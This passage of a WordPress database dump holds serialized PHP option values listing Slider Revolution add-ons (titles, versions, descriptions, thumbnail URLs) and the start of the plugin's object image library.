To\";s:4:\"sort\";s:2:\"60\";s:11:\"last_update\";s:10:\"2023-10-06\";s:6:\"global\";b:0;s:7:\"premium\";s:7:\"premium\";s:4:\"logo\";O:8:\"stdClass\":3:{s:3:\"img\";s:76:\"//updates.themepunch-ext-a.tools/revslider/addons/images/addon_mousetrap.jpg\";s:5:\"color\";s:0:\"\";s:4:\"text\";s:2:\"MT\";}}s:28:\"revslider-liquideffect-addon\";O:8:\"stdClass\":16:{s:2:\"id\";s:3:\"500\";s:9:\"releaseid\";s:2:\"21\";s:4:\"slug\";s:28:\"revslider-liquideffect-addon\";s:12:\"version_from\";s:5:\"6.6.0\";s:10:\"version_to\";s:5:\"9.9.9\";s:5:\"title\";s:10:\"Distortion\";s:6:\"line_1\";s:22:\"Add Distortion Effects\";s:6:\"line_2\";s:30:\"to your slides and transitions\";s:9:\"available\";s:5:\"3.0.5\";s:10:\"background\";s:0:\"\";s:6:\"button\";s:6:\"How To\";s:4:\"sort\";s:2:\"70\";s:11:\"last_update\";s:10:\"2023-01-09\";s:6:\"global\";b:0;s:7:\"premium\";s:7:\"premium\";s:4:\"logo\";O:8:\"stdClass\":3:{s:3:\"img\";s:77:\"//updates.themepunch-ext-a.tools/revslider/addons/images/addon_distortion.jpg\";s:5:\"color\";s:0:\"\";s:4:\"text\";s:2:\"LE\";}}s:22:\"revslider-lottie-addon\";O:8:\"stdClass\":16:{s:2:\"id\";s:3:\"420\";s:9:\"releaseid\";s:2:\"25\";s:4:\"slug\";s:22:\"revslider-lottie-addon\";s:12:\"version_from\";s:5:\"6.5.1\";s:10:\"version_to\";s:5:\"9.9.9\";s:5:\"title\";s:6:\"Lottie\";s:6:\"line_1\";s:53:\"Adds support for the popular Lottie Animation format,\";s:6:\"line_2\";s:70:\" including animation control, style customization and a local library.\";s:9:\"available\";s:5:\"3.1.2\";s:10:\"background\";s:0:\"\";s:6:\"button\";s:6:\"How To\";s:4:\"sort\";s:2:\"80\";s:11:\"last_update\";s:10:\"2023-06-26\";s:6:\"global\";b:0;s:7:\"premium\";s:7:\"premium\";s:4:\"logo\";O:8:\"stdClass\":3:{s:3:\"img\";s:73:\"//updates.themepunch-ext-a.tools/revslider/addons/images/addon_lottie.jpg\";s:5:\"color\";s:0:\"\";s:4:\"text\";s:2:\"LT\";}}s:26:\"revslider-paintbrush-addon\";O:8:\"stdClass\":16:{s:2:\"id\";s:3:\"411\";s:9:\"releaseid\";s:2:\"23\";s:4:\"slug\";s:26:\"revslider-paintbrush-addon\";s:12:\"version_from\";s:5:\"6.5.1\";s:10:\"version_to\";s:5:\"9.9.9\";s:5:\"title\";s:10:\"Paintbrush\";s:6:\"line_1\";s:14:\"Paint or Erase\";s:6:\"line_2\";s:22:\"your background images\";s:9:\"available\";s:5:\"3.0.4\";s:10:\"background\";s:0:\"\";s:6:\"button\";s:6:\"How To\";s:4:\"sort\";s:2:\"90\";s:11:\"last_update\";s:10:\"2023-08-09\";s:6:\"global\";b:0;s:7:\"premium\";s:7:\"premium\";s:4:\"logo\";O:8:\"stdClass\":3:{s:3:\"img\";s:77:\"//updates.themepunch-ext-a.tools/revslider/addons/images/addon_paintbrush.jpg\";s:5:\"color\";s:0:\"\";s:4:\"text\";s:2:\"PB\";}}s:22:\"revslider-charts-addon\";O:8:\"stdClass\":16:{s:2:\"id\";s:3:\"483\";s:9:\"releaseid\";s:2:\"27\";s:4:\"slug\";s:22:\"revslider-charts-addon\";s:12:\"version_from\";s:6:\"6.5.17\";s:10:\"version_to\";s:5:\"9.9.9\";s:5:\"title\";s:6:\"Charts\";s:6:\"line_1\";s:93:\"The Charts addon allows you to create visually impressive line or bar graphs from .csv data, \";s:6:\"line_2\";s:56:\"with tons of options to take full control of the design.\";s:9:\"available\";s:5:\"3.0.5\";s:10:\"background\";s:73:\"//updates.themepunch-ext-a.tools/revslider/addons/images/addon_charts.png\";s:6:\"button\";s:0:\"\";s:4:\"sort\";s:3:\"100\";s:11:\"last_update\";s:10:\"2022-08-04\";s:6:\"global\";b:0;s:7:\"premium\";s:7:\"premium\";s:4:\"logo\";O:8:\"stdClass\":3:{s:3:\"img\";s:73:\"//updates.themepunch-ext-a.tools/revslider/addons/images/addon_charts.jpg\";s:5:\"color\";s:0:\"\";s:4:\"text\";s:2:\"CH\";}}s:22:\"revslider-slicey-addon\";O:8:\"stdClass\":16:{s:2:\"id\";s:3:\"417\";s:9:\"releaseid\";s:2:\"13\";s:4:\"slug\";s:22:\"revslider-slicey-addon\";s:12:\"version_from\";s:5:\"6.5.1\";s:10:\"version_to\";s:5:\"9.9.9\";s:5:\"title\";s:6:\"Slicey\";s:6:\"line_1\";s:20:\"Slice \'em up nicely!\";s:6:\"line_2\";s:38:\"Create image slices of your background\";s:9:\"available\";s:5:\"3.0.4\";s:10:\"background\";s:0:\"\";s:6:\"button\";s:6:\"How To\";s:4:\"sort\";s:3:\"110\";s:11:\"last_update\";s:10:\"2023-01-09\";s:6:\"global\";b:0;s:7:\"premium\";s:7:\"premium\";s:4:\"logo\";O:8:\"stdClass\":3:{s:3:\"img\";s:73:\"//updates.themepunch-ext-a.tools/revslider/addons/images/addon_slicey.jpg\";s:5:\"color\";s:0:\"\";s:4:\"text\";s:2:\"SL\";}}s:25:\"revslider-filmstrip-addon\";O:8:\"stdClass\":16:{s:2:\"id\";s:3:\"422\";s:9:\"releaseid\";s:2:\"10\";s:4:\"slug\";s:25:\"revslider-filmstrip-addon\";s:12:\"version_from\";s:5:\"6.5.6\";s:10:\"version_to\";s:5:\"9.9.9\";s:5:\"title\";s:9:\"Filmstrip\";s:6:\"line_1\";s:44:\"Display a continously rotating set of images\";s:6:\"line_2\";s:26:\"for your slide backgrounds\";s:9:\"available\";s:5:\"3.0.6\";s:10:\"background\";s:0:\"\";s:6:\"button\";s:6:\"How To\";s:4:\"sort\";s:3:\"125\";s:11:\"last_update\";s:10:\"2023-01-09\";s:6:\"global\";b:0;s:7:\"premium\";s:7:\"premium\";s:4:\"logo\";O:8:\"stdClass\":3:{s:3:\"img\";s:76:\"//updates.themepunch-ext-a.tools/revslider/addons/images/addon_filmstrip.jpg\";s:5:\"color\";s:0:\"\";s:4:\"text\";s:2:\"FS\";}}s:27:\"revslider-maintenance-addon\";O:8:\"stdClass\":16:{s:2:\"id\";s:3:\"421\";s:9:\"releaseid\";s:1:\"4\";s:4:\"slug\";s:27:\"revslider-maintenance-addon\";s:12:\"version_from\";s:5:\"6.5.0\";s:10:\"version_to\";s:5:\"9.9.9\";s:5:\"title\";s:15:\"Coming & Maint.\";s:6:\"line_1\";s:37:\"Simple Coming Soon & Maintenance Page\";s:6:\"line_2\";s:42:\"Let your visitors know what\'s up and when!\";s:9:\"available\";s:5:\"3.0.0\";s:10:\"background\";s:0:\"\";s:6:\"button\";s:9:\"Configure\";s:4:\"sort\";s:3:\"127\";s:11:\"last_update\";s:10:\"2023-07-17\";s:6:\"global\";b:1;s:7:\"premium\";s:7:\"premium\";s:4:\"logo\";O:8:\"stdClass\":3:{s:3:\"img\";s:84:\"//updates.themepunch-ext-a.tools/revslider/addons/images/addon_underconstruction.jpg\";s:5:\"color\";s:0:\"\";s:4:\"text\";s:2:\"MT\";}}s:24:\"revslider-revealer-addon\";O:8:\"stdClass\":16:{s:2:\"id\";s:3:\"416\";s:9:\"releaseid\";s:2:\"19\";s:4:\"slug\";s:24:\"revslider-revealer-addon\";s:12:\"version_from\";s:5:\"6.5.1\";s:10:\"version_to\";s:5:\"9.9.9\";s:5:\"title\";s:6:\"Reveal\";s:6:\"line_1\";s:9:\"Reveal...\";s:6:\"line_2\";s:37:\"...your inner beast... and RevSliders\";s:9:\"available\";s:5:\"3.0.3\";s:10:\"background\";s:0:\"\";s:6:\"button\";s:6:\"How To\";s:4:\"sort\";s:3:\"130\";s:11:\"last_update\";s:10:\"2023-01-09\";s:6:\"global\";b:0;s:7:\"premium\";s:7:\"premium\";s:4:\"logo\";O:8:\"stdClass\":3:{s:3:\"img\";s:73:\"//updates.themepunch-ext-a.tools/revslider/addons/images/addon_reveal.jpg\";s:5:\"color\";s:0:\"\";s:4:\"text\";s:2:\"RV\";}}s:24:\"revslider-panorama-addon\";O:8:\"stdClass\":16:{s:2:\"id\";s:3:\"423\";s:9:\"releaseid\";s:2:\"17\";s:4:\"slug\";s:24:\"revslider-panorama-addon\";s:12:\"version_from\";s:5:\"6.5.6\";s:10:\"version_to\";s:5:\"9.9.9\";s:5:\"title\";s:8:\"Panorama\";s:6:\"line_1\";s:14:\"Panorama AddOn\";s:6:\"line_2\";s:28:\"Display images in 360 degree\";s:9:\"available\";s:5:\"3.0.9\";s:10:\"background\";s:0:\"\";s:6:\"button\";s:6:\"How To\";s:4:\"sort\";s:3:\"135\";s:11:\"last_update\";s:10:\"2023-01-09\";s:6:\"global\";b:0;s:7:\"premium\";s:7:\"premium\";s:4:\"logo\";O:8:\"stdClass\":3:{s:3:\"img\";s:75:\"//updates.themepunch-ext-a.tools/revslider/addons/images/addon_panorama.jpg\";s:5:\"color\";s:0:\"\";s:4:\"text\";s:2:\"PN\";}}s:27:\"revslider-scrollvideo-addon\";O:8:\"stdClass\":16:{s:2:\"id\";s:3:\"498\";s:9:\"releaseid\";s:2:\"26\";s:4:\"slug\";s:27:\"revslider-scrollvideo-addon\";s:12:\"version_from\";s:5:\"6.6.0\";s:10:\"version_to\";s:5:\"9.9.9\";s:5:\"title\";s:12:\"Scroll Video\";s:6:\"line_1\";s:114:\"This addon allows you to generate a sequence of images from any html5 video and play them with scroll interaction.\";s:6:\"line_2\";s:49:\"Quality options are included for optimal results!\";s:9:\"available\";s:5:\"3.0.4\";s:10:\"background\";s:78:\"//updates.themepunch-ext-a.tools/revslider/addons/images/addon_scrollvideo.jpg\";s:6:\"button\";s:6:\"How To\";s:4:\"sort\";s:3:\"140\";s:11:\"last_update\";s:10:\"2023-01-09\";s:6:\"global\";b:0;s:7:\"premium\";s:7:\"premium\";s:4:\"logo\";O:8:\"stdClass\":3:{s:3:\"img\";s:78:\"//updates.themepunch-ext-a.tools/revslider/addons/images/addon_scrollvideo.jpg\";s:5:\"color\";s:0:\"\";s:4:\"text\";s:2:\"SV\";}}s:31:\"revslider-explodinglayers-addon\";O:8:\"stdClass\":16:{s:2:\"id\";s:3:\"407\";s:9:\"releaseid\";s:2:\"22\";s:4:\"slug\";s:31:\"revslider-explodinglayers-addon\";s:12:\"version_from\";s:5:\"6.5.1\";s:10:\"version_to\";s:5:\"9.9.9\";s:5:\"title\";s:16:\"Exploding Layers\";s:6:\"line_1\";s:23:\"Add explosive particles\";s:6:\"line_2\";s:24:\"to your layers animation\";s:9:\"available\";s:5:\"3.0.5\";s:10:\"background\";s:0:\"\";s:6:\"button\";s:6:\"How To\";s:4:\"sort\";s:3:\"150\";s:11:\"last_update\";s:10:\"2023-01-09\";s:6:\"global\";b:0;s:7:\"premium\";s:7:\"premium\";s:4:\"logo\";O:8:\"stdClass\":3:{s:3:\"img\";s:76:\"//updates.themepunch-ext-a.tools/revslider/addons/images/addon_exploding.jpg\";s:5:\"color\";s:0:\"\";s:4:\"text\";s:2:\"EL\";}}s:23:\"revslider-sharing-addon\";O:8:\"stdClass\":16:{s:2:\"id\";s:3:\"397\";s:9:\"releaseid\";s:1:\"5\";s:4:\"slug\";s:23:\"revslider-sharing-addon\";s:12:\"version_from\";s:5:\"6.5.0\";s:10:\"version_to\";s:5:\"9.9.9\";s:5:\"title\";s:14:\"Social Sharing\";s:6:\"line_1\";s:17:\"Share your slides\";s:6:\"line_2\";s:50:\"with RevSlider \"actions\" because sharing is caring\";s:9:\"available\";s:5:\"3.0.1\";s:10:\"background\";s:0:\"\";s:6:\"button\";s:11:\"How to use?\";s:4:\"sort\";s:3:\"165\";s:11:\"last_update\";s:10:\"2023-07-08\";s:6:\"global\";b:1;s:7:\"premium\";s:7:\"premium\";s:4:\"logo\";O:8:\"stdClass\":3:{s:3:\"img\";s:80:\"//updates.themepunch-ext-a.tools/revslider/addons/images/addon_socialsharing.jpg\";s:5:\"color\";s:0:\"\";s:4:\"text\";s:2:\"SH\";}}s:26:\"revslider-whiteboard-addon\";O:8:\"stdClass\":16:{s:2:\"id\";s:3:\"419\";s:9:\"releaseid\";s:1:\"1\";s:4:\"slug\";s:26:\"revslider-whiteboard-addon\";s:12:\"version_from\";s:5:\"6.5.1\";s:10:\"version_to\";s:5:\"9.9.9\";s:5:\"title\";s:10:\"Whiteboard\";s:6:\"line_1\";s:31:\"Create Hand-Drawn Presentations\";s:6:\"line_2\";s:45:\"that are understandable, memorable & engaging\";s:9:\"available\";s:5:\"3.0.5\";s:10:\"background\";s:81:\"//updates.themepunch-ext-a.tools/revslider/addons/images/whiteboard_widget_bg.jpg\";s:6:\"button\";s:11:\"How to use?\";s:4:\"sort\";s:3:\"170\";s:11:\"last_update\";s:10:\"2023-01-09\";s:6:\"global\";b:0;s:7:\"premium\";s:7:\"premium\";s:4:\"logo\";O:8:\"stdClass\":3:{s:3:\"img\";s:77:\"//updates.themepunch-ext-a.tools/revslider/addons/images/addon_whiteboard.jpg\";s:5:\"color\";s:0:\"\";s:4:\"text\";s:2:\"WB\";}}s:24:\"revslider-polyfold-addon\";O:8:\"stdClass\":16:{s:2:\"id\";s:3:\"414\";s:9:\"releaseid\";s:2:\"14\";s:4:\"slug\";s:24:\"revslider-polyfold-addon\";s:12:\"version_from\";s:5:\"6.5.1\";s:10:\"version_to\";s:5:\"9.9.9\";s:5:\"title\";s:22:\"Polyfold Scroll Effect\";s:6:\"line_1\";s:32:\"Add sharp edges to your sliders \";s:6:\"line_2\";s:35:\"as they scroll into and out of view\";s:9:\"available\";s:5:\"3.0.6\";s:10:\"background\";s:0:\"\";s:6:\"button\";s:11:\"How to use?\";s:4:\"sort\";s:3:\"180\";s:11:\"last_update\";s:10:\"2023-01-09\";s:6:\"global\";b:0;s:7:\"premium\";s:7:\"premium\";s:4:\"logo\";O:8:\"stdClass\":3:{s:3:\"img\";s:75:\"//updates.themepunch-ext-a.tools/revslider/addons/images/addon_polyfold.jpg\";s:5:\"color\";s:7:\"#3e186f\";s:4:\"text\";s:2:\"PF\";}}s:29:\"revslider-domain-switch-addon\";O:8:\"stdClass\":16:{s:2:\"id\";s:2:\"78\";s:9:\"releaseid\";s:2:\"11\";s:4:\"slug\";s:29:\"revslider-domain-switch-addon\";s:12:\"version_from\";s:5:\"6.0.0\";s:10:\"version_to\";s:5:\"9.9.9\";s:5:\"title\";s:13:\"Domain Switch\";s:6:\"line_1\";s:17:\"Switch Image URLs\";s:6:\"line_2\";s:37:\"in sliders from one domain to another\";s:9:\"available\";s:5:\"1.0.1\";s:10:\"background\";s:0:\"\";s:6:\"button\";s:11:\"How to use?\";s:4:\"sort\";s:3:\"300\";s:11:\"last_update\";s:10:\"2022-02-19\";s:6:\"global\";b:0;s:7:\"premium\";s:7:\"premium\";s:4:\"logo\";O:8:\"stdClass\":3:{s:3:\"img\";s:79:\"//updates.themepunch-ext-a.tools/revslider/addons/images/addon_domainswitch.jpg\";s:5:\"color\";s:0:\"\";s:4:\"text\";s:2:\"DS\";}}s:23:\"revslider-refresh-addon\";O:8:\"stdClass\":16:{s:2:\"id\";s:3:\"415\";s:9:\"releaseid\";s:2:\"10\";s:4:\"slug\";s:23:\"revslider-refresh-addon\";s:12:\"version_from\";s:5:\"6.5.1\";s:10:\"version_to\";s:5:\"9.9.9\";s:5:\"title\";s:8:\"(Re)Load\";s:6:\"line_1\";s:39:\"Reload the current page or a custom URL\";s:6:\"line_2\";s:34:\"after a certain time, loops, slide\";s:9:\"available\";s:5:\"3.0.4\";s:10:\"background\";s:0:\"\";s:6:\"button\";s:6:\"How To\";s:4:\"sort\";s:3:\"330\";s:11:\"last_update\";s:10:\"2023-01-09\";s:6:\"global\";b:0;s:7:\"premium\";s:7:\"premium\";s:4:\"logo\";O:8:\"stdClass\":3:{s:3:\"img\";s:73:\"//updates.themepunch-ext-a.tools/revslider/addons/images/addon_reload.jpg\";s:5:\"color\";s:0:\"\";s:4:\"text\";s:2:\"RF\";}}s:25:\"revslider-rel-posts-addon\";O:8:\"stdClass\":16:{s:2:\"id\";s:2:\"55\";s:9:\"releaseid\";s:1:\"9\";s:4:\"slug\";s:25:\"revslider-rel-posts-addon\";s:12:\"version_from\";s:7:\"5.2.4.1\";s:10:\"version_to\";s:5:\"9.9.9\";s:5:\"title\";s:13:\"Related Posts\";s:6:\"line_1\";s:25:\"Add related Posts Sliders\";s:6:\"line_2\";s:31:\"at the end of your post content\";s:9:\"available\";s:5:\"2.0.2\";s:10:\"background\";s:0:\"\";s:6:\"button\";s:9:\"Configure\";s:4:\"sort\";s:3:\"340\";s:11:\"last_update\";s:10:\"2023-06-12\";s:6:\"global\";b:1;s:7:\"premium\";s:7:\"premium\";s:4:\"logo\";O:8:\"stdClass\":3:{s:3:\"img\";s:76:\"//updates.themepunch-ext-a.tools/revslider/addons/images/addon_wprelated.jpg\";s:5:\"color\";s:0:\"\";s:4:\"text\";s:2:\"RP\";}}s:20:\"revslider-snow-addon\";O:8:\"stdClass\":16:{s:2:\"id\";s:3:\"399\";s:9:\"releaseid\";s:1:\"6\";s:4:\"slug\";s:20:\"revslider-snow-addon\";s:12:\"version_from\";s:5:\"6.5.1\";s:10:\"version_to\";s:5:\"9.9.9\";s:5:\"title\";s:12:\"Holiday Snow\";s:6:\"line_1\";s:12:\"Let it snow!\";s:6:\"line_2\";s:32:\"Add animated snow to any Slider \";s:9:\"available\";s:5:\"3.0.5\";s:10:\"background\";s:0:\"\";s:6:\"button\";s:11:\"How to use?\";s:4:\"sort\";s:3:\"380\";s:11:\"last_update\";s:10:\"2023-01-09\";s:6:\"global\";b:0;s:7:\"premium\";s:7:\"premium\";s:4:\"logo\";O:8:\"stdClass\":3:{s:3:\"img\";s:71:\"//updates.themepunch-ext-a.tools/revslider/addons/images/addon_snow.jpg\";s:5:\"color\";s:0:\"\";s:4:\"text\";s:2:\"SN\";}}s:23:\"revslider-gallery-addon\";O:8:\"stdClass\":16:{s:2:\"id\";s:3:\"378\";s:9:\"releaseid\";s:1:\"2\";s:4:\"slug\";s:23:\"revslider-gallery-addon\";s:12:\"version_from\";s:6:\"6.4.11\";s:10:\"version_to\";s:5:\"9.9.9\";s:5:\"title\";s:17:\"WordPress Gallery\";s:6:\"line_1\";s:31:\"Replace the standard WP Gallery\";s:6:\"line_2\";s:31:\"with the Sliders of your choice\";s:9:\"available\";s:5:\"2.0.5\";s:10:\"background\";s:0:\"\";s:6:\"button\";s:9:\"Configure\";s:4:\"sort\";s:3:\"430\";s:11:\"last_update\";s:10:\"2023-12-11\";s:6:\"global\";b:1;s:7:\"premium\";s:7:\"premium\";s:4:\"logo\";O:8:\"stdClass\":3:{s:3:\"img\";s:76:\"//updates.themepunch-ext-a.tools/revslider/addons/images/addon_wpgallery.jpg\";s:5:\"color\";s:0:\"\";s:4:\"text\";s:2:\"GA\";}}s:22:\"revslider-backup-addon\";O:8:\"stdClass\":16:{s:2:\"id\";s:2:\"53\";s:9:\"releaseid\";s:1:\"3\";s:4:\"slug\";s:22:\"revslider-backup-addon\";s:12:\"version_from\";s:5:\"5.2.0\";s:10:\"version_to\";s:5:\"9.9.9\";s:5:\"title\";s:6:\"Backup\";s:6:\"line_1\";s:12:\"Make Backups\";s:6:\"line_2\";s:25:\"Revisions for your safety\";s:9:\"available\";s:5:\"2.0.3\";s:10:\"background\";s:0:\"\";s:6:\"button\";s:11:\"How to use?\";s:4:\"sort\";s:3:\"500\";s:11:\"last_update\";s:10:\"2023-05-31\";s:6:\"global\";b:1;s:7:\"premium\";s:7:\"premium\";s:4:\"logo\";O:8:\"stdClass\":3:{s:3:\"img\";s:73:\"//updates.themepunch-ext-a.tools/revslider/addons/images/addon_backup.jpg\";s:5:\"color\";s:0:\"\";s:4:\"text\";s:2:\"BU\";}}s:19:\"revslider-404-addon\";O:8:\"stdClass\":16:{s:2:\"id\";s:2:\"62\";s:9:\"releaseid\";s:1:\"8\";s:4:\"slug\";s:19:\"revslider-404-addon\";s:12:\"version_from\";s:3:\"5.3\";s:10:\"version_to\";s:5:\"9.9.9\";s:5:\"title\";s:3:\"404\";s:6:\"line_1\";s:39:\"Build custom 404 \"Page not Found\" Pages\";s:6:\"line_2\";s:28:\"with Slider Revolution swag!\";s:9:\"available\";s:5:\"2.0.1\";s:10:\"background\";s:0:\"\";s:6:\"button\";s:9:\"Configure\";s:4:\"sort\";s:3:\"620\";s:11:\"last_update\";s:10:\"2022-12-04\";s:6:\"global\";b:1;s:7:\"premium\";s:7:\"premium\";s:4:\"logo\";O:8:\"stdClass\":3:{s:3:\"img\";s:70:\"//updates.themepunch-ext-a.tools/revslider/addons/images/addon_404.jpg\";s:5:\"color\";s:0:\"\";s:4:\"text\";s:3:\"404\";}}s:30:\"revslider-prevnext-posts-addon\";O:8:\"stdClass\":16:{s:2:\"id\";s:2:\"63\";s:9:\"releaseid\";s:1:\"9\";s:4:\"slug\";s:30:\"revslider-prevnext-posts-addon\";s:12:\"version_from\";s:3:\"5.4\";s:10:\"version_to\";s:5:\"9.9.9\";s:5:\"title\";s:14:\"Adjacent Posts\";s:6:\"line_1\";s:30:\"Display previous and next post\";s:6:\"line_2\";s:28:\"to the currently showing one\";s:9:\"available\";s:5:\"2.0.2\";s:10:\"background\";s:0:\"\";s:6:\"button\";s:9:\"Configure\";s:4:\"sort\";s:3:\"630\";s:11:\"last_update\";s:10:\"2023-08-04\";s:6:\"global\";b:1;s:7:\"premium\";s:7:\"premium\";s:4:\"logo\";O:8:\"stdClass\":3:{s:3:\"img\";s:77:\"//updates.themepunch-ext-a.tools/revslider/addons/images/addon_wpadjacent.jpg\";s:5:\"color\";s:0:\"\";s:4:\"text\";s:2:\"PN\";}}s:21:\"revslider-login-addon\";O:8:\"stdClass\":16:{s:2:\"id\";s:3:\"388\";s:9:\"releaseid\";s:2:\"11\";s:4:\"slug\";s:21:\"revslider-login-addon\";s:12:\"version_from\";s:5:\"6.5.0\";s:10:\"version_to\";s:5:\"9.9.9\";s:5:\"title\";s:10:\"Login Page\";s:6:\"line_1\";s:25:\"Very simple WP Login Page\";s:6:\"line_2\";s:34:\"enhanced with your favorite slider\";s:9:\"available\";s:5:\"3.0.1\";s:10:\"background\";s:0:\"\";s:6:\"button\";s:9:\"Configure\";s:4:\"sort\";s:3:\"650\";s:11:\"last_update\";s:10:\"2023-06-12\";s:6:\"global\";b:1;s:7:\"premium\";s:7:\"premium\";s:4:\"logo\";O:8:\"stdClass\":3:{s:3:\"img\";s:72:\"//updates.themepunch-ext-a.tools/revslider/addons/images/addon_login.jpg\";s:5:\"color\";s:0:\"\";s:4:\"text\";s:2:\"LI\";}}s:24:\"revslider-featured-addon\";O:8:\"stdClass\":16:{s:2:\"id\";s:3:\"379\";s:9:\"releaseid\";s:2:\"12\";s:4:\"slug\";s:24:\"revslider-featured-addon\";s:12:\"version_from\";s:6:\"6.4.11\";s:10:\"version_to\";s:5:\"9.9.9\";s:5:\"title\";s:20:\"Post Featured Slider\";s:6:\"line_1\";s:25:\"Display a featured Slider\";s:6:\"line_2\";s:41:\"instead of a featured Image in your Posts\";s:9:\"available\";s:5:\"2.0.4\";s:10:\"background\";s:0:\"\";s:6:\"button\";s:9:\"Configure\";s:4:\"sort\";s:3:\"660\";s:11:\"last_update\";s:10:\"2023-05-31\";s:6:\"global\";b:1;s:7:\"premium\";s:7:\"premium\";s:4:\"logo\";O:8:\"stdClass\":3:{s:3:\"img\";s:77:\"//updates.themepunch-ext-a.tools/revslider/addons/images/addon_wpfeatured.jpg\";s:5:\"color\";s:0:\"\";s:4:\"text\";s:2:\"FT\";}}s:23:\"revslider-weather-addon\";O:8:\"stdClass\":16:{s:2:\"id\";s:3:\"402\";s:9:\"releaseid\";s:2:\"16\";s:4:\"slug\";s:23:\"revslider-weather-addon\";s:12:\"version_from\";s:5:\"6.5.0\";s:10:\"version_to\";s:5:\"9.9.9\";s:5:\"title\";s:7:\"Weather\";s:6:\"line_1\";s:21:\"Every where you go...\";s:6:\"line_2\";s:36:\"...always take the weather with you!\";s:9:\"available\";s:5:\"3.0.1\";s:10:\"background\";s:0:\"\";s:6:\"button\";s:9:\"Configure\";s:4:\"sort\";s:3:\"690\";s:11:\"last_update\";s:10:\"2023-05-31\";s:6:\"global\";b:0;s:7:\"premium\";s:7:\"premium\";s:4:\"logo\";O:8:\"stdClass\":3:{s:3:\"img\";s:74:\"//updates.themepunch-ext-a.tools/revslider/addons/images/addon_weather.jpg\";s:5:\"color\";s:0:\"\";s:4:\"text\";s:2:\"WT\";}}s:30:\"revslider-duotonefilters-addon\";O:8:\"stdClass\":16:{s:2:\"id\";s:3:\"406\";s:9:\"releaseid\";s:2:\"18\";s:4:\"slug\";s:30:\"revslider-duotonefilters-addon\";s:12:\"version_from\";s:5:\"6.5.1\";s:10:\"version_to\";s:5:\"9.9.9\";s:5:\"title\";s:7:\"Duotone\";s:6:\"line_1\";s:7:\"Duotone\";s:6:\"line_2\";s:25:\"Because one is not enough\";s:9:\"available\";s:5:\"3.0.5\";s:10:\"background\";s:0:\"\";s:6:\"button\";s:6:\"How To\";s:4:\"sort\";s:3:\"710\";s:11:\"last_update\";s:10:\"2023-01-09\";s:6:\"global\";b:0;s:7:\"premium\";s:7:\"premium\";s:4:\"logo\";O:8:\"stdClass\":3:{s:3:\"img\";s:74:\"//updates.themepunch-ext-a.tools/revslider/addons/images/addon_duotone.jpg\";s:5:\"color\";s:0:\"\";s:4:\"text\";s:3:\"DTF\";}}}','yes'),(167,'revslider-library-check','1705525932','yes'),(168,'revslider-library-hash','dae3de1eb57eeeee008b70e9a23844b5','yes'),(169,'rs-library','a:3:{s:4:\"hash\";s:32:\"dae3de1eb57eeeee008b70e9a23844b5\";s:7:\"objects\";a:417:{i:0;a:12:{s:2:\"id\";s:3:\"198\";s:6:\"handle\";s:16:\"object_dvd_1.png\";s:4:\"name\";s:3:\"DVD\";s:4:\"tags\";a:2:{i:0;a:3:{s:2:\"id\";s:1:\"4\";s:6:\"handle\";s:5:\"music\";s:4:\"name\";s:5:\"Music\";}i:1;a:3:{s:2:\"id\";s:1:\"3\";s:6:\"handle\";s:6:\"office\";s:4:\"name\";s:6:\"Office\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1000\";s:6:\"height\";s:4:\"1000\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2016-10-17 12:43:17\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"1\";}i:1;a:12:{s:2:\"id\";s:3:\"188\";s:6:\"handle\";s:18:\"object_plant_1.png\";s:4:\"name\";s:7:\"Plant 1\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"18\";s:6:\"handle\";s:4:\"misc\";s:4:\"name\";s:4:\"Misc\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1500\";s:6:\"height\";s:4:\"1500\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2016-09-12 16:25:27\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"1\";}i:2;a:12:{s:2:\"id\";s:3:\"187\";s:6:\"handle\";s:16:\"object_pen_1.png\";s:4:\"name\";s:5:\"Pen 1\";s:4:\"tags\";a:2:{i:0;a:3:{s:2:\"id\";s:1:\"5\";s:6:\"handle\";s:3:\"art\";s:4:\"name\";s:3:\"Art\";}i:1;a:3:{s:2:\"id\";s:1:\"3\";s:6:\"handle\";s:6:\"office\";s:4:\"name\";s:6:\"Office\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1000\";s:6:\"height\";s:4:\"1000\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2016-09-12 16:25:27\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"1\";}i:3;a:12:{s:2:\"id\";s:3:\"172\";s:6:\"handle\";s:16:\"object_egg_1.png\";s:4:\"name\";s:3:\"Egg\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"16\";s:6:\"handle\";s:4:\"food\";s:4:\"name\";s:4:\"Food\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:3:\"600\";s:6:\"height\";s:3:\"600\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2016-08-18 15:34:49\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"1\";}i:4;a:12:{s:2:\"id\";s:3:\"171\";s:6:\"handle\";s:19:\"object_guitar_1.png\";s:4:\"name\";s:6:\"Guitar\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:1:\"4\";s:6:\"handle\";s:5:\"music\";s:4:\"name\";s:5:\"Music\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1600\";s:6:\"height\";s:4:\"1600\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2016-08-18 15:34:49\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"1\";}i:5;a:12:{s:2:\"id\";s:3:\"170\";s:6:\"handle\";s:21:\"object_envelope_1.png\";s:4:\"name\";s:15:\"Closed Envelope\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:1:\"3\";s:6:\"handle\";s:6:\"office\";s:4:\"name\";s:6:\"Office\";}}s:11:\"description\";s:8:\"New 